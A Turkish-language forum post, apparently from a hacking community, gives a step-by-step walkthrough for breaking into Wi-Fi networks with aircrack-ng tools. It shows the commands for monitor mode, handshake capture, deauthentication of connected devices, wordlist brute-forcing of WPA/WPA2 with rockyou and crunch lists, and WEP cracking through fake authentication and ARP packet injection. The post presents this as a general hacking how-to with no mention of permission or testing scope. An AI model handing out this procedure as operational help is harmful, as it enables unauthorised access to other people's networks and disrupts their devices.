Network Attack
Bu attack tipini gerçekleştirmek için bir wifi-card'a ihtiyacımız olacak.
https://www.hepsiburada.com/magbox-...icilari-uyumlu-led-gostergeli-pm-HB00000H840T
Ben bundan kullanıyorum kendisi çoğu saldırıda işe yarıyor.
Wifi-Card'ımızı aldığımıza göre saldırımıza başlayabiliriz. iyi seyirler.
Monitör Moda Geçmek için:
airmon-ng start wlan0
Managed Moda Geçmek için:
airmon-ng stop wlan0mon
Wifi-Card'ımızı monitör moda geçirdiğimize göre artık ağların bilgilerini toplayabiliriz.
iwconfig yazarak da bunu kontrol edebiliriz.
Daha sağlıklı olması açısından görseli internetten bulduğum için bende Mode:Managed olarak gözüküyor sizde Mode:Monitor olarak gözükecektir.
Crack for WPA or WPA2
airodump-ng wlan0mon
Görmüş olduğunuz üzere belli bir uzaklığımızda bulunan tüm wifi ağları terminalimizde gözükmeye başladı.
Belli bir ağa özel bilgi edinmek istiyorsak:
--bssid ve --channel değerlerini girmemiz ve o ağa karşı brute force saldırısı yapacağımız için bir handshake yakalamamız gerekecektir, bunun için --write yazıp .cap dosyamıza bir isim belirlemeliyiz. Komutun sonunda ise interface tanımlamamız yeterli olacaktır.
airodump-ng --bssid 11:22:AB:33:C4:5B --channel 1 --write wcrack wlan0mon
O ağa özel dinleme işlemimiz başladı, Handshake yakalamamız için herhangi birisinin o internete tekrar bağlanması gerekcektir.
Bu işlemi kısaltmak istersek o ağda bulunan herhangi bir cihaza deauthentication (yetkisizlendirme) saldırısı yapabiliriz.
-a: bssid değeri, -c: saldırı yapılacak cihaz --deauth: atılacak paket sayısı
aireplay-ng --deauth 10 -a 11:22:AB:33:C4:5B -c 11:22:33:44:55:66 wlan0mon
Paket atma işlemi tamamlandığında handshake yakalamış olacağız herhangi bir yere kaydetmesini söylemediğimiz için muhtemelen root klasörünün içerisine kaydedildi.
Artık elimizde Handshake dosyamız olduğuna göre şifre kırma işlemini gerçekleştirebiliriz.
Kali linux içerisinde yüklü gelen aircrack-ng aracımızı cap dosyamıza karşı çalıştıracağız.
First Option: (hazır wordlist)
aricrack-ng *handshake dosyamız* -w *çalıştırmak istediğimiz wordlist*
aircrack-ng wcrack-01.cap -w wordlist.txt
aircrack-ng wcrack-01.cap -w fasttrack.txt
aircrack-ng wcrack-01.cap -w rockyou.txt
Second Option: (tahmine dayalı)
Bu seçeneğin ilk seçenekten tek farkı wordlisti kendimiz oluşturacağımızdır.
Bunun için crunch komutunu kullanacağız.
crunch 8 9 123xy -o wpacrunch
*En az 8, en fazla 9 haneli ve içinde 1, 2, 3, x, y barındıran tüm olasılıkları "wpacrunch" adı altına yazdır.*
Wordlistimizi oluşturduğumuza göre artık şifre kırma işlemlerimize geçebiliriz.
aircrack-ng wcrack-01.cap -w wpacrunch
*aircrack-ng aracı aracılığı ile wpacrunch wordlistini handshake dosyasına karşı çalıştır.*
Eğer saldırı yapılan modemin şifresi wordlistlerimiz içerisinde var ise şifreyi kıracak ve ekteki gibi bir çıktı verecektir.
WPA veya WPA2 güvenlikli ağlarımız için crack işlemlerimiz tamamlandı.
Şimdi de günümüzde çok kullanılmasa da WEP güvenlikli ağları kıracağız.
Crack for WEP
Bu işlem için Fake Authentication ile IV üretimi yapmamız gerekcektir.
("WPA, WPA2" için FakeAuth ile "IV" ürettiremeyiz bu sebeple WEP için geçerli.)
(interneti kullanamayız ve herhangi bir parolaya erişemeyiz.)
aireplay-ng --fakeauth 0 -a 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
-h = mac adress
Mac adresinizi öğrenmek istiyorsanız:
ifconfig > wlan0mon periyodunun 2. satırında bulunann unspec kısmından sonraki 6 hane size mac adresinizi verecektir.
...unspec 74-DA-3B-6E-CF-9C-3A-00-00-00...
Mac adresiniz: 74-DA-3B-6E-CF-9C
IV Ürettirmek yani Paket enjeksiyonu yapmak için:
aireplay-ng --arpreplay -b 11:22:AB:33:C4:5B -h 74-DA-3B-6E-CF-9C wlan0mon
aircrack-ng wcrack-01.cap
*aircrack-ng"yi "wcrack-01.cap"e karşı çalıştır.*
Ek Bilgi:
Herhangi bir wordlisti görmek istiyorsanız:
cat wpacrunch
Şifremiz o wordlist içerisinde yer alıyor mu diye kontrol etmek için:
cat wordlist.txt | grep 123asd
Alternatif Wifi-Card önerileri:
Atheros AR9271
Ralink RT3070
Ralink RT3572
Ralink RT5572
Realtek RTL8812AU
Ralink RT5370N
MediaTek MT7610U
Note: Kendi seçiminizi yapmak istiyorsanız, alacağınız wifi-card'ın monitör mode ve linux uyumlu olmasına,
Packed Injection desteklemesi durumunu kontrol etmelisiniz.
Okuduğunuz için teşekkürler, kendisi benim ilk makalem oldu eksiklerim varsa kusuruma bakmayın. iyi Hacklemeler THT ailesi
Son düzenleme: